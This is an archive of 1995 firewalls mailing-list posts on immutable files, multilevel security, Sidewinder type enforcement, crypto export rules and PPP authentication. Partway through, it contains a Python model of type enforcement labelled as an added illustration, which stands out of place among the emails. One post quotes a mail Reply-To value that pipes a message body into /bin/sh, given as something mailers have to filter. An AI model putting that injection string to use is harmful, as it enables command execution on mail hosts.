>before we call it a security feature.

Why don't you RTFM before you take a few more jabs at it and then you'll waste less time? Just a friendly suggestion.

>How do they administer the system in multiuser mode? Presumably adding
>users and accounts and such would be disallowed. Also adding undesired
>services such as a telnetd or packet grabber would be disallowed.

You only set immutable on files you want it on. Devices and special files get default immutability at certain run levels but tagging it on a file is the admin's option.
So if you set all the files in /etc/ as immutable then, sure, administering the machine would be complicated.

>If I can affect any file that root runs during single user mode, I can
>still hack the system, I just have to wait for a re-boot.

This is a good point. BUT I'd like you to consider the fact that the immutable files feature has closed off a whole category of well-known weaknesses, and has given the administrator a useful tool to help build more solid systems. It's not too intrusive and it's not too awkward, and it's easy to understand and I suspect that I will find several cases in the next few years where I'll be glad to have it.

You're welcome to dismiss immutable files as "security speak" rather than real security (whatever that is) but I suspect it'll help improve UNIX system security some small bit - I know I wish Suns, HPs, DECs, etc, had at least the device lockdown stuff. Every little bit helps. That's my own little heresy. I know the Association of Computer Security Graybeards don't want to do ANYTHING unless it's DONE RIGHT FOR SURE but sometimes you can close off whole categories of problems with a line or two of code, and you're crazy not to.

mjr.

From firewalls-owner Thu Aug 10 22:59:55 1995
From: "Marcus J. Ranum"
Message-Id: <199508110519.BAA15636@switchblade.iwi.com>
Subject: Re: Multilevel Security is good for firewalls
To: mdr@vodka.sse.att.com
Date: Fri, 11 Aug 1995 01:19:46 -0400 (EDT)
Cc: mjr@iwi.com, firewalls@greatcircle.com
In-Reply-To: <9508101832.AA01220@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 02:34:02 pm
Reply-To: mjr@iwi.com
Organization: Information Works! Inc, Baltimore, MD

>I can just as easily run B1 unix w/o network daemons if all I want is to
>live w/o proxies. If you proxy in DOS or windows, then the OS has
>absolutely no protection from software errors.

[I may get the orange-bookspeak wrong, but I'm sure some kind soul will correct me if I do]

My impression is that in orange book land, a proxy is a "trusted process." It takes advantage of the features of the TCB (Trusted Computing Base) that protect the system, but, because it's moving stuff around, the designer is trusting that it does at least some of that stuff right. But if there's a software error in the proxy, then it's just as much a problem as if there's a software error in a proxy on an un-orange book system. Of course, a trusted process' software gets carefully evaluated and formally modelled and all that stuff, too. But if there's a flaw, it is still a potentially fatal flaw.

Put another way: if you run plug-gw for telnet between * and your inside network you're still wide open, B1 or no B1.

This is why I keep urging people to recognize that there are TWO (at least) protective relationships that a firewall embodies.
    How well it protects itself from attack
    How well it protects its network from attack

All the orange book protections help with the firewall's protecting itself from attack, but don't do anything for the network, unless you're running B1 on the inside network, and labelling and a complete trusted environment. Most commercial networks don't do that, and won't ever do that. And if they do, they'll rip it out in 2 years.

So: consider that the firewall must protect the helpless machines behind it, which are running SunOS, AIX, and Windows for Workgroups + IP. :) Now, the question is: what does my firewall do for them? The B1-ness of the firewall at that point is totally irrelevant. What's now important is whether or not the mailer blocks out "| sed '1,/^$/d' | /bin/sh" as a Reply-To address, and whether the trusted FTP service on the firewall binds ftp-data when it talks to the inside, and so on. Those details are reflected not in formal methods, but in niggling, ugly policy reflected in lines of code.

mjr.

From firewalls-owner Thu Aug 10 23:00:14 1995
Date: 10 Aug 95 17:06:00 +1700
From: MAHAJAN_VIVEK@tandem.com
Message-Id: <199508102232.AA15673@comm.tandem.com>
To: firewalls@greatcircle.com
Subject: Encrypted data across national boundaries???

Hello:

I have followed closely the discussion on encrypted ftp. I have looked over what options are available and have found that there are always some kind of restrictions associated with each option.
If there is a need to send data to about 50 countries (including places such as Russia/China) is there any kind of encryption solution either hardware or software that can be used across the board? The data will originate from London for Europe, from Singapore and Australia for Asia, and from USA for North and South America. According to what I have looked into there is no solution that will allow a standard acceptable encryption method without violating export laws of the countries from which the data originates. Even if there were a standard for North and South America, a standard for Europe, and a standard for Asia and Australia, that would be acceptable.

Any help would be appreciated.

Regards
Vivek

From firewalls-owner Thu Aug 10 23:35:19 1995
Date: Thu, 10 Aug 1995 23:13:11 -0700 (PDT)
From: Damien Sorder
Subject: Re: sleazewinder
To: David Kovar
Cc: *Hobbit*, firewalls@GreatCircle.COM
In-Reply-To: <199508091658.MAA02175@nda.nda.com>

> The only result of this that I've seen so far is at a trade show the
> other week. At their booth they were announcing something like:
>
> Hackers: 0%
> Sidewinder: 100%
>
> Sidewinder stopped every single one of the best hackers efforts!

You are assuming the best tried.. which is probably incorrect.
From firewalls-owner Fri Aug 11 03:00:36 1995
From: Mark
Message-Id: <199508110728.AA52971@junkers.lochard.com.au>
Subject: Re: s[id]ewinder
To: smith@sctc.com (Rick Smith)
Date: Fri, 11 Aug 1995 18:28:46 +1000 (E )
Cc: firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199508092131.QAA05680@shade.sctc.com> from "Rick Smith" at Aug 9, 95 04:31:17 pm

>The Challenge is to break through the firewall and extract a message
>stored on the challenge site's LAN. I've never seen anyone broadcast
>a copy of the message, so I doubt anyone has really managed to reach
>it. We do hear third hand reports of "consultants" and sales droids
>who claim to have broken Sidewinder so they can sell some snake oil.
>
>We *did* give out a jacket once to someone who did something truly
>inspired (used mknod to construct an alternative path to the disk
>drive) even though the guy didn't reach the internal net. Of course,
>we fixed that bug. It's written up in Dan's paper for the next CSAC.

If I were to change ideology and think as a cracker :), the last thing in the English speaking world I would do would be to use my ultra top secret KY^2 technique against the challenge hosts.
I would *know* that every packet into the machine is being written to a log and the technique will be analysed and maybe published so all of the net can close the hole. What egoless night typer would want that to happen, suddenly waking up to find the net humming with news of the break in method and realising that pretentious dorky jacket hanging in the closet was the reason for it.

It's dumb and serves little or no purpose for anyone with an ounce of knowledge to go and try anything remotely useful on the sidewinder host(s). If one wanted notoriety there are much easier ways to do it, break into apple.com and publish MacOS code or microsoft.com and publish Windoze code. You would certainly get a much bigger juicer out of that and the amount of friends you would make because of it (should you be dumb enough to go public) would be staggering. Plus you don't have to reveal your methods.

In other words, very few people with an ounce of insight are taking this challenge very seriously at all. I certainly regard it as flag waving.

Mark
mark@lochard.com.au
My opinions are my own.

P.S. I personally regard doing a black bag job on the SCTC offices a much less obvious way of getting the info :) Time to drag out the crowbars and TEMPEST antennae. Claiming the reward would be another story.
From firewalls-owner Fri Aug 11 03:30:21 1995
Date: Fri, 11 Aug 1995 17:55:55 +0800 (MYT)
From: Tham Huei Hwan
Reply-To: Tham Huei Hwan
Subject: Internet
To: firewalls@greatcircle.com

Hi,

I am new in this mailing list and also new in internet. Can anybody inform me where I can get the information from the internet or by e-mail?

Thank You.
E-mail: Tham.Huei.Hwan@bass.com.my

From firewalls-owner Fri Aug 11 04:04:59 1995
Date: Fri, 11 Aug 1995 11:48:38 +0100
From: se@adv.sbc.sony.co.jp (Steve England)
Message-Id: <9508111048.AA06986@adv.sbc.sony.co.jp>
To: firewalls@greatcircle.com
Subject: Attack, Attack, Attack

Realising this is not a full disclosure list a la bugtraq et al - but trying to stick to the philosophy of the list's intention, I ask the following.

Given a lot of us (how many times have you seen the words "newbie", "decloaking" etc. prepending a question) haven't the privileged rite of passage to obtain attack strategies, types of break-in, how to break-in, how to gain root once inside etc. that the luminaries of this list get to see/hear about/experience first hand/know from having years experience (apologies if this is not the case). How do the rest of us get to know these?
Whilst I'm not (quite) asking for "how do I break into site X" I believe there is a lot that can be shared by the above said people to aid us *newer* people - can we share this kind of info within this list (Brent?) otherwise aren't all we are doing is practising another form of security through obscurity? ie. the few that know versus the most that don't? inasmuch as a typical firewall admin "well we can stop attack a,b,c cos we know about them from CERT/CIAC/bugtraq/ids/... but we can't stop d,e,f... cos we don't know what they are".

By the individuals mentioned sharing this info will help others with their firewall setup/testing/monitoring (albeit not particularly scientific in nature) & may lead them to spawn other ideas of how the methods hopefully presented may be mutated to try to gain access/resources - hence getting them into an attackers mindset (?!).

I guess what I'm after is compiling a cookbook in effect that may lead to other attacks being realised & shared with the list (not that I believe for one minute that Security of any form is merely a check list). This may have a positive knock-on effect of vendors listening in to test their product(s) prior to release for the attacks mentioned.
Steve

From firewalls-owner Fri Aug 11 05:00:29 1995
Date: Fri, 11 Aug 1995 13:28:41 +0100
From: Sander Wels
To: Tham.Huei.Hwan@bass.com.my, firewalls@greatcircle.com
Subject: Internet (A)

Try "Accessing the Internet By E-Mail" Doctor Bob's Guide to Offline Internet Access

You can receive a copy by sending an e-mail to: listserv@ubvm.cc.buffalo.edu
Enter only this line in the BODY of the note:

GET INTERNET BY-EMAIL NETTRAIN F=MAIL

Another interesting idea is to subscribe to the BUSTOUR: send a mail to majordomo@colossus.net with, in the BODY of the mail:

SUBSCRIBE TOURBUS

Get more information from the Roadmap workshops:

To find out how to retrieve the Roadmap workshop lessons, and to find out a little more about the Roadmap workshop itself, all you have to do is send an e-mail letter to LISTSERV@UA1VM.UA.EDU (that's "you-ay-won-vee-em") with the command

GET MAP PACKAGE F=MAIL

in the *BODY* of your e-mail letter.

NOTE: Simply replying to the letter that you are reading right now with a GET MAP PACKAGE F=MAIL command will *NOT* work. You must send a *NEW* letter to LISTSERV@UA1VM.UA.EDU with the command GET MAP PACKAGE F=MAIL in the body of your letter for your command to work.
After you send your letter off, a computer at the University of Alabama will process your letter, and will -- usually within 24 hours -- e-mail you two letters: one telling you a little more about the Roadmap workshop, and another telling you how you can retrieve the workshop lessons with a few, simple e-mail commands.

Cheers,
Sander Wels

>>> Tham Huei Hwan 11-08-95 10.55 >>>
Hi,
I am new in this mailing list and also new in internet. Can anybody inform me where I can get the information from the internet or by e-mail?
Thank You.
E-mail: Tham.Huei.Hwan@bass.com.my

From firewalls-owner Fri Aug 11 05:30:01 1995
Date: Fri, 11 Aug 1995 14:08:20 +0200
To: firewalls@greatcircle.com
From: Mats.Bredell@udac.se (Mats Bredell)
Subject: Re: Encrypted data across national boundaries???
Cc: MAHAJAN_VIVEK@tandem.com

>Hello:
>I have followed closely the discussion on encrypted ftp. I have looked over
>what are the options available and have found that there are always some kind
>of restrictions associated with each option. If there is a need to send data
>to about 50 countries (including places such as Russia/China) is there any
>kind of encryption solution either hardware or software that can be used
>across the board? The data will originate from London for Europe, from
>Singapore and Australia for Asia, and from USA for North and South America.
>According to what I have looked into there is no solution that will allow a
>standard acceptable encryption method without violating export laws of the
>countries from which the data originates. Even if there were a standard for
>North and South America, a standard for Europe, and a standard for Asia and
>Australia that would be acceptable.

How about getting the free SSL library from Australia? It uses SSL for authentication and encryption, and there are patches available for the most common clients and servers. Using this you should be able to cover most of the world. One exception is probably France. Also, if you use it in the US you have to pay RSA a license fee.

Would this work?

/Mats
-------------------------------------------------------------------
Mats Bredell                    Mats.Bredell@udac.se
UDAC / Network C                Communication service systems
Ph: +46 18 187817               Sweden
Fax: +46 18 516600

From firewalls-owner Fri Aug 11 06:00:30 1995
Date: Fri, 11 Aug 95 08:21:47 -0400
Message-Id: <9508111221.AA15214@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: To OS or not to OS

Andrew writes:

>We believe that any general purpose OS (especially UNIX), is less than ideal
>for a FW, since it has a lot of overhead and a lot of potential for security
>holes due to its complexity.
>A special purpose system with a very small code base and NO extra
>unnecessary services can provide the best performing most secure firewall.

Exactly the point I was trying to make. In a PC, the Basic Input Output System (BIOS) provides everything that is needed to run the computer. MS/PC/DR/NW-DOS, OS/2, Novell Netware, Linux, BSD just build on this structure or use it to load their own structure.

It is entirely possible to create a dedicated limited-functionality machine using 32 bit structures and ring separation by starting with nothing more than the ROM-BIOS that comes with every PC. Now this is not trivial. I do most such programming with a "fixed" version of MASM. AFAIK there are no commercial C or C++ libraries available though it is known that certain large organizations use C for OS development so...

It has been my experience that such programming has the advantage of being very tight (part of the reason my a-v stuff is so small). Being in ROM, the BIOS also has the advantage of being fixed (yes I know about flash ROM - is your choice), verifiable, and fully capable. It is not an "easy way out" though, it does require some effort to master but IMNSHO can also be very rewarding. Just ask Bill Gates.

Warmly,
Padgett

From firewalls-owner Fri Aug 11 06:35:10 1995
Date: Fri, 11 Aug 95 09:02:23 -0400
Message-Id: <9508111302.AA15381@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E.
Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Encrypted data across national boundaries

1) Contrary to popular belief I am an engineer, not a lawyer.

2) The issue is not a single one, but rather multiple.

   a) crypto mechanism
      i) export from point of origin
      ii) in transit between country of origin and country of originator
      iii) import to originator
      iv) export from originator's site
      v) in transit from originator's country to recipients country
      vi) import to each recipient's site
   b) encrypted messages
      i) within country of origin
      ii) in transit over intervening areas
      iii) within country of receipt
   c) legality of use
      i) in country of origin
      ii) in country of receipt

It is true today that some of these are not a problem (b-ii) but may well be in the near future. (a-ii) & (a-v) are specifically covered in ITAR, not just (a-i). (c) is not a factor in the US but appears to be being considered in AU.

Each is a separate issue. Consider PGP. For an American business communicating with a site in France ITAR says that the US company may not send the PGP software to the recipient (a-1), so they will have to tell the French site to get their own (PGP 2.62i) - am not sure if this would be a violation of (a-iii), I don't get paid for this you know 8*). (b-iii) requires permission. Today in the US (b-i) does not. If the company downloaded the domestic copy from MIT instead of buying it from ViaCrypt, they are in violation of (c-1).

Bottom line: to be responsible, each area must be checked off (let me know if I missed something) and this just covers the basics - nothing to do with *what* messages are sent. Is not as simple as it looks.
Warmly,
Padgett

From firewalls-owner Fri Aug 11 07:09:40 1995
Date: Fri, 11 Aug 1995 09:04:00 -0400 (EDT)
From: Steve Gaarder
To: firewalls@GreatCircle.COM, MAHAJAN_VIVEK@tandem.com
Subject: Re: Encrypted data across national boundaries???
In-Reply-To: <199508102232.AA15673@comm.tandem.com>
References: <199508102232.AA15673@comm.tandem.com>

I, too, have been looking for an encryption system that can be used internationally. I think I may have found something, though it doesn't address countries such as Russia where strong encryption is outlawed. The package is ssh, an encrypted replacement for rsh. It supports tunnelling X and other protocols. And it was developed outside the US! I've downloaded it but so far have only just started to play with it. More info is at http://www.cs.hut.fi/ssh.
Steven Gaarder
Network and Systems Administrator
gaarder@actech.com
A C Technology, Ithaca, N.Y., USA

From firewalls-owner Fri Aug 11 07:19:48 1995
Date: Fri, 11 Aug 1995 08:52:44 -0500 (CDT)
From: Chuck Dean
To: Firewalls@GreatCircle.com
Subject: DOS Firewall (was Re: Multilevel Security...)

Mark Riggins writes....

>Plus you're handing the security of your organization over to an
>unevaluated black box based on someones idea of what security means.
>Has that idea seen the light of peer review? Or can anyone order one
>of these, do some disassembly and find an easy hole? Plus DOS may be
>listening to more than you think if it has a tcp/ip stack. Do you
>have source to the tcp/ip code?

I don't have any connection to the company but I have gotten info from them for evaluation. The company Network-1 offers the product for download for evaluation (you have to call to get a key to access the software): http://www.iu.new/n1/home.html

The product appears to do packet filtering, with a gui front end. Replaces DOS when it loads and does not have or require a TCP/IP stack in DOS. Their point being that if someone managed to crash the firewall they are stuck in a dumb uncommunicative DOS box. Requires min 486-50.

Would like to hear from someone who has actually used this system.
Chuck Dean
Voice (334)450-4794
-------------------------------------------------------------------
[ASCII-art logo: MOBILE GAS SERVICE CORPORATION]
2828 Dauphin St. Mobile, Alabama, 36606
cdean@mobile-gas.com
____________________________________________________________________

From firewalls-owner Fri Aug 11 08:00:27 1995
Date: Fri, 11 Aug 1995 08:59:53 -0500 (CDT)
From: Chuck Dean
To: Firewalls@GreatCircle.com
Subject: security of CHAP or PAP

We are in the middle of preparing capital budgets for next fiscal year (October) and finally have our REAL (ie leased line) internet connection and firewall in the budget. I've seen several people ask about secure dialup and where to place it in the system. I also have a router for "remote network access" via ppp dialup in the budget for administrative connections. Question is how secure is chap and pap authentication in ppp? We would like to place the ppp dialup inside the protected lan environment if we can be sure that only clients with the authority get connection.
We have talked about using dial back modems but that would be a problem when on the road. Are chap and pap protocols adequate security for ppp?

Chuck Dean
Voice (334)450-4794
-------------------------------------------------------------------
[ASCII-art logo: MOBILE GAS SERVICE CORPORATION]
2828 Dauphin St. Mobile, Alabama, 36606
cdean@mobile-gas.com
____________________________________________________________________

From firewalls-owner Fri Aug 11 08:12:47 1995
From: GLorge@officetech.com
Date: 11 Aug 95 08:37:00 EDT
To: firewalls@greatcircle.com, MAHAJAN_VIVEK@tandem.com
Subject: re: Type enforcement ???
Message-Id: <78472B3001C42F79@-SMF->
In-Reply-To: <199508102207.AA18745@comm.tandem.com>
Reply-To: GLorge@officetech.com
References: <199508102207.AA18745@comm.tandem.com>

Here's the info right from the proverbial "horse's mouth".

http://www.sctc.com/sidewinder/FAQs/HTML/the_sidewinder.html

From Secure Computing Corp.'s FAQ:
---------
6. What is type enforcement?
Type enforcement is a patented computer security mechanism that controls how programs use files and how they interact with other programs. Standard commercial operating systems on personal computers never provide any built-in protections against misbehaving software, so there is no way for the underlying system to force programs to behave. Unix systems have some limited facilities that have proven difficult to deploy securely and can often be circumvented. Type enforcement provides mandatory protection, which means that the protections can not be disabled or circumvented while the system is in normal operation.

Type enforcement provides the strongest protection available against connection risks. Network service software occasionally suffers from a bug that allows an attacker to feed arbitrary programs to the server to run. Over the years this has appeared in the finger, electronic mail, and most recently the World Wide Web servers. In weakly protected PC or Unix systems such attacks could overrun the computer. Type enforcement limits the damage by restricting both the programs the attacker may use and the files that may be examined or modified. Our World Wide Web server can provide pages that the server itself can not possibly modify, because type enforcement blocks the server's write attempts.

Because of its protection against firewall subversion, Sidewinder's type enforcement also provides the strongest platform on which to host strong measures against traffic risks. At present, traffic risks are largely blocked with connection and application layer gateways, which filter out risky forms of lower level IP traffic. Future releases will provide application layer filters that can detect some irregularities on incoming electronic mail addresses, validate traffic based on cryptographic signatures, check for restricted legends in outgoing files, and so on.
7. How does type enforcement compare to protections normally provided by UNIX and other commercial operating systems?

History has shown that standard commercial operating systems provide unreliable security. Most commercial multi-user operating systems provide protections that may be enabled and disabled by a trusted administrator, sometimes referred to as a super user. Countless successful attacks have occurred because an attacker managed to become a super user just long enough to break down remaining security measures. UNIX has another protection mechanism called chroot that tries to isolate an attacker within a subset of the file system. However, this does not prevent the attacker from mounting further attacks across attached networks, masquerading as a trusted process residing on the penetrated computer. Sidewinder's type enforcement isolates such an attack to the network on which it arrived, so that an attack from the Internet will not penetrate an internal, protected network.

Type enforcement provides other improvements over conventional mechanisms. It gives finer grained control over which programs and files may interact. And it can automatically generate alarms if selected constraints are violated.
---------------------------------------------------------------------------

Vivek - I'd be interested in hearing your perceptions on SideWinder and Secure Computing. EMAIL direct please.

Gary S. Lorge
glorge@officetech.com
http://www.officetech.com

------------- Original Text
From firewalls-owner@GreatCircle.COM, on 8/10/95 1:46 PM:
To: firewalls@greatcircle.com

Hello:

Is there a document out there that explains what is type enforcement. One of the commercial firewall vendors I talked to explained to me that theirs is the only product that implements type enforcement and this gives their product a level of security no other product in the market does.
I am quite familiar with the different firewall products and what kind of implementation they have but I am not quite familiar with what was described to me as "true type enforcement." What does it mean in the context of firewalls and where if any can I get more information about this concept? I would appreciate any help.

Regards
Vivek

From firewalls-owner Fri Aug 11 08:30:49 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9508111430.AA22130@sonic.nmti.com.nmti.com>
Subject: Re: Encrypted data across national boundaries???
To: Mats.Bredell@udac.se (Mats Bredell)
Date: Fri, 11 Aug 1995 09:30:25 -0500 (CDT)
Cc: firewalls@GreatCircle.COM, MAHAJAN_VIVEK@tandem.com
In-Reply-To: from "Mats Bredell" at Aug 11, 95 02:08:20 pm

> How about getting the free SSL library from Australia?

Better hurry up, with Australia getting ready to outlaw strong crypto escrowed or not for everyone but banks.
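The type enforcement mechanism described in the Secure Computing FAQ that Gary Lorge quotes above (programs run in domains, files and network interfaces carry types, and a fixed table decides which domain may do what to which type, with no super-user path that switches the table off) can be modelled in a few lines. The Python below is an added illustration written for this archive; it is not Sidewinder's code or Secure Computing's policy. The domain and type names (www_d, admin_d, mail_d, www_pages_t, int_net_t and so on) and the whole policy table are constructed for the example.

```python
"""Toy model of type enforcement, constructed to illustrate the quoted FAQ.

Every running program belongs to a *domain*; every file and network
interface carries a *type*; a fixed policy table says which domain may
perform which operations on which type. The program's uid is deliberately
not consulted: becoming "root" inside a domain does not widen the table,
which is the difference from the super-user model the FAQ criticises.
"""
from dataclasses import dataclass
from types import MappingProxyType
from typing import Dict, FrozenSet, List, Tuple

# Constructed policy for the example (not Sidewinder's real policy).
# (domain, type) -> operations allowed; any pair absent here is denied.
POLICY = MappingProxyType({
    ("www_d",   "www_pages_t"):  frozenset({"read"}),            # serve pages
    ("www_d",   "www_log_t"):    frozenset({"append"}),          # log, never rewrite
    ("www_d",   "ext_net_t"):    frozenset({"accept", "send"}),  # Internet side only
    ("admin_d", "www_pages_t"):  frozenset({"read", "write"}),   # content updates
    ("admin_d", "www_log_t"):    frozenset({"read"}),
    ("mail_d",  "ext_net_t"):    frozenset({"accept", "send"}),
    ("mail_d",  "int_net_t"):    frozenset({"send"}),            # mail relays inward
    ("mail_d",  "mail_spool_t"): frozenset({"read", "append"}),
})


@dataclass(frozen=True)
class Subject:
    domain: str
    uid: int  # carried only for the audit trail; the policy never looks at it


def check(subject: Subject, obj_type: str, op: str, audit: List[str]) -> bool:
    """Mandatory check: True if the table allows op on obj_type, else False.

    Every denial is appended to the audit list, which is where the FAQ's
    "automatically generate alarms if selected constraints are violated"
    would hook in.
    """
    allowed: FrozenSet[str] = POLICY.get((subject.domain, obj_type), frozenset())
    if op in allowed:
        return True
    audit.append(f"DENY {subject.domain}(uid={subject.uid}) {op} {obj_type}")
    return False


def policy_is_immutable() -> bool:
    """There is no run-time path that edits or switches off the table."""
    try:
        POLICY[("www_d", "int_net_t")] = frozenset({"send"})  # type: ignore[index]
    except TypeError:
        return True
    return False


def simulate_compromised_web_server() -> Tuple[Dict[str, bool], List[str]]:
    """An attacker who fed the web server arbitrary code now runs as uid 0,
    but still inside www_d, so the table, not the uid, decides each access."""
    audit: List[str] = []
    www = Subject(domain="www_d", uid=0)
    results = {
        "serve_page":         check(www, "www_pages_t",  "read",   audit),
        "deface_page":        check(www, "www_pages_t",  "write",  audit),
        "append_log":         check(www, "www_log_t",    "append", audit),
        "rewrite_log":        check(www, "www_log_t",    "write",  audit),
        "reach_internal_net": check(www, "int_net_t",    "send",   audit),
        "read_mail_spool":    check(www, "mail_spool_t", "read",   audit),
    }
    return results, audit


if __name__ == "__main__":
    results, audit = simulate_compromised_web_server()
    for action, ok in results.items():
        print(f"{action:20s} {'allowed' if ok else 'DENIED'}")
    print("\n".join(audit))
    print("policy table immutable:", policy_is_immutable())
```

The run shows the two properties the FAQ claims: the server domain can read the pages it serves but cannot write them even as uid 0, and it has no entry at all for int_net_t, so a subverted server stays confined to the network it was reached from. Contrast this with chroot, which limits the file system view but says nothing about which networks the process may talk to.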
From firewalls-owner Fri Aug 11 09:08:40 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9508111413.AA21882@sonic.nmti.com.nmti.com>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mdr@vodka.sse.att.com
Date: Fri, 11 Aug 1995 09:13:49 -0500 (CDT)
In-Reply-To: <9508101726.AA26472@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 01:27:54 pm

> Would all of the cron scripts and rc scripts and network startup
> scripts also be immutable?

That's up to you. 4.4BSD is not distributed as a packaged system.

> By the time you get around to locking all of the files that have to be
> immutable, you might as well make /, /var and /usr (please sub in bsd
> equivalent names) readonly file systems. Ouch!

Except you can log to append-only files. You can't do that with BSD.

> How does init ever go back to init state 1 ?

You reboot.

> Forcing a reboot from
> scratch for every (even trivial admin) would work, but ouch! that hurts too!

I can't think of another way to do it if you really want to be secure. The biggest hole is internet domain sockets, really.
You can still do maintainance from the console, by having init run a program that opens the files it needs to manage things while in level 0 and leaving it running on the console (with whatever authentication mechanism it wants to provide) while the system goes into level 1. Now the maintainance mode only exists in memory while that program is running. There's no way to get to it from outside that executable image. From firewalls-owner Fri Aug 11 09:27:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28437 for firewalls-outgoing; Fri, 11 Aug 1995 08:19:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28396 for ; Fri, 11 Aug 1995 08:18:54 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma028388; Fri Aug 11 08:18:05 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id KAA26365 for greatcircle.com!firewalls; Fri, 11 Aug 1995 10:06:29 -0500 Received: by ris1.nmti.com (smail2.5) id AA16277; 11 Aug 95 09:13:17 CDT (Fri) Received: by sonic.nmti.com; id AA23931; Fri, 11 Aug 1995 09:38:15 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508111438.AA23931@sonic.nmti.com.nmti.com> Subject: Re: To OS or not to OS To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security) Date: Fri, 11 Aug 1995 09:38:15 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9508111221.AA15214@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 11, 95 08:21:47 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1186 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Exactly the point I was trying to make. In a PC, the Basic Input Output System > (BIOS) provides everything that is needed to run the computer. Not. > MS/PC/DR/NW-DOS, > OS/2, Novell Netware, Linux, BSD just build on this structure or use it to > load their own structure. 
The only thing any UNIX uses the BIOS for is to load itself into memory. The BIOS interface is *so* broken that no high performance operating system uses it for anything else. NT doesn't use the BIOS ... it has its own drivers. OS/2 will use the BIOS but prefers not to. I wrote a terminal program, once. It ran on a PC/XT. I worked hard as I could to use the BIOS, but the serial interface couldn't even keep up with 300 baud. The screen interface was able to handle 9600 with really hairy heuristics to avoid redraws. I stuck to small model for efficiency, but I still had to do my own serial drivers. > It is entirely possible to create a dedicated limited-functionality machine > using 32 bit structures and ring separation by starting with nothing more > than the ROM-BIOS that comes with every PC. You sure it's actually using the BIOS for anything but logging and user interface? I am skeptical. From firewalls-owner Fri Aug 11 09:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28641 for firewalls-outgoing; Fri, 11 Aug 1995 08:25:59 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28617 for ; Fri, 11 Aug 1995 08:25:54 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma028611; Fri Aug 11 08:25:27 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA15775; Fri, 11 Aug 95 10:34:35 EDT Message-Id: <9508111434.AA15775@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Multilevel Security is good for firewalls To: mjr@iwi.com Date: Fri, 11 Aug 1995 10:36:31 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199508110519.BAA15636@switchblade.iwi.com> from "Marcus J. 
Ranum" at Aug 11, 95 01:19:46 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus, > > >I can just as easily run B1 unix w/o network daemons if all I want to > >live w/o proxies. If you proxy in DOS or windows, then the OS has > >absolutly no protection from software errors. > > [I may get the orange-bookspeak wrong, but I'm sure some kind > soul will correct me if I do] > > My impression is that in orange book land, a proxy is a > "trusted process." It takes advantage of the features of the TCB > (Trusted Computing Base) that protect the system, but, because it's > moving stuff around, the designer is trusting that it does at least > some of that stuff right. But if there's a software error in the > proxy, then it's just as much a problem as if there's a software > error in a proxy on an un-orange book system. Of course, a trusted > process' software gets carefully evaluated and formally modelled > and all that stuff, too. But if there's a flaw, it is still a > potentially fatal flaw. Not true. Of course we trust the proxy to do those proxy things that it does so well, but we don't trust it to modify the underlying OS. In an MLS system, we can create as many rings or layers of protection as desired. Each higher level ring can rely on the lower levels' services, but cannot write to them. Typical Setup 1: Levels 1 proxies and other applications, webservers etc. ---------------MAC barrier-------------------------- 0 TCB, including audit trails, config files, cron scripts, devices etc This setup lets the proxies run above the operating system level. Thus a proxy flaw is no more serious than a login at level 1. The OS is protected from all modifications and trojan horses. Even the root password would do no good. 
Furthermore, we will be able to securely monitor the operation of the proxy and all processes that spawn from it.

Typical Setup 2:

Levels
  2   proxies and other applications, webservers etc.
---------------MAC barrier--------------------------
  1   proxy code and configuration stuff
---------------MAC barrier--------------------------
  0   TCB, including audit trails, config files, cron scripts, devices etc

This setup would protect the proxy's code and config from the actual running daemons. Proxy administration would occur at the protected level 1 w/o jeopardizing the OS. More complicated models are available that would protect the proxies from one another, so that proxy-ftp would never be able to modify proxy-telnet's behaviour and so on.

I haven't looked at the Type Enforcement model, but something tells me that it's capable of the same type of protection. Where can we get some details of how TE works?

Rick, care to post a couple of setups like the above?

> Put another way: if you run plug-gw for telnet between * and
> your inside network you're still wide open, B1 or no B1.
>
> This is why I keep urging people to recognize that there are
> TWO (at least) protective relationships that a firewall embodies.
>
> How well it protects itself from attack
> How well it protects its network from attack

Is it too much to imagine that protecting itself from attack helps it protect the network from attack?

> All the orange book protections help with the firewall's
> protecting itself from attack, but don't do anything for the
> network, unless you're running B1 on the inside network, and
> labelling and a complete trusted environment. Most commercial
> networks don't do that, and won't ever do that. And if they do,
> they'll rip it out in 2 years.
>
> So: consider that the firewall must protect the helpless
> machines behind it, which are running SunOS, AIX, and Windows for
> workgroups + IP. :) Now, the question is: what does my firewall
> do for them? The B1-ness of the firewall at that point is totally
> irrelevant. What's now important is whether or not the mailer
